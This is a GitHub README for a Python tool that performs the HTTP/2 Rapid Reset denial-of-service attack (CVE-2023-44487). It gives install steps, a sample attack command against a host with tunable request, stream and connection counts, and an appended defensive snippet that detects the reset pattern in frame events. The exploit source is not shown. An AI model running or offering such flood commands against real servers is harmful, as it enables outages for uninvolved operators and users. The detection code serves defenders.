studiogangster / CVE-2023-44487

A Python-based exploit to test the rapid reset attack (CVE-2023-44487)

Home Page: https://github.com/studiogangster/CVE-2023-44487


HTTP2 Rapid Reset Attack: CVE-2023-44487

Quick exploit to test the rapid reset attack (CVE-2023-44487). Note: for educational purposes only.


Installation

Clone the repository to your local machine using Git, install poetry, and run the program:

 git clone https://github.com/studiogangster/CVE-2023-44487.git
 cd CVE-2023-44487

 # Install Poetry, if you haven't already:
 curl -sSL https://install.python-poetry.org | python -

 # Install the project dependencies:
 poetry install

 # Activate the virtual environment created by Poetry:
 poetry shell

 # Show the help text:
 python main.py

 # Example:
 python main.py --host example.com --path /api --headers "Authorization: Basic dummy-token ; Custom-Header:Custom-Header-Value" --port 443 --requests_count 100 --max_streams 20 --parallel_connections 2

Usage

Usage: main.py [OPTIONS]

Options:
  --host TEXT                     Host URL  [required]
  --path TEXT                     Path on the host  [required]
  --headers TEXT                  Headers (comma-separated)  [required]
  --port INTEGER                  Port number  [required]
  --requests_count INTEGER        Number of requests to be sent  [required]
  --max_streams INTEGER           Maximum streams to be opened in parallel
                                  [required]
  --parallel_connections INTEGER  Number of parallel connections to be made
                                  with the server. (TCP connection)
                                  [required]
  --help                          Show this message and exit.
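
For the server side of a test like the one above, one way to spot the rapid reset pattern in HTTP/2 frame events, as an added example that is not code from this repository. The event tuple layout, the function names and the thresholds are assumptions, and the sample events are constructed.

```python
from collections import defaultdict, deque

# Constructed sample events: (timestamp_seconds, connection_id, frame_type, stream_id).
# The tuple layout is an assumption for this example, not a real server log format.
def make_sample_events():
    events = []
    # Connection "A": 100 streams, each cancelled 1 ms after its HEADERS frame.
    for i in range(100):
        sid = 2 * i + 1  # client-initiated stream ids are odd
        t = i * 0.002
        events.append((t, "A", "HEADERS", sid))
        events.append((t + 0.001, "A", "RST_STREAM", sid))
    # Connection "B": 20 ordinary requests, one cancelled after 2 s.
    for i in range(20):
        events.append((i * 0.5, "B", "HEADERS", 2 * i + 1))
    events.append((2.0, "B", "RST_STREAM", 1))
    return sorted(events)

def find_rapid_reset(events, window=1.0, max_resets=50, quick=0.1):
    """Return {conn_id: peak number of quick client resets inside `window` seconds}
    for connections whose peak exceeds `max_resets`. A reset is "quick" when it
    arrives within `quick` seconds of the HEADERS frame that opened the stream.
    `events` must be sorted by timestamp."""
    opened = defaultdict(dict)   # conn -> {stream_id: time the stream was opened}
    recent = defaultdict(deque)  # conn -> times of quick resets still in the window
    peak = defaultdict(int)
    for ts, conn, ftype, sid in events:
        if ftype == "HEADERS":
            opened[conn].setdefault(sid, ts)
        elif ftype == "RST_STREAM":
            t_open = opened[conn].pop(sid, None)
            if t_open is None or ts - t_open > quick:
                continue  # unknown stream, or an ordinary late cancellation
            q = recent[conn]
            q.append(ts)
            while q and ts - q[0] > window:
                q.popleft()
            peak[conn] = max(peak[conn], len(q))
    return {c: n for c, n in peak.items() if n > max_resets}

if __name__ == "__main__":
    print(find_rapid_reset(make_sample_events()))
```

Connection "A" never has more than one stream open at a time, so a concurrent-stream limit alone does not flag it; the per-connection reset rate does.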


License: Apache License 2.0


Languages

Language: Python 100.0%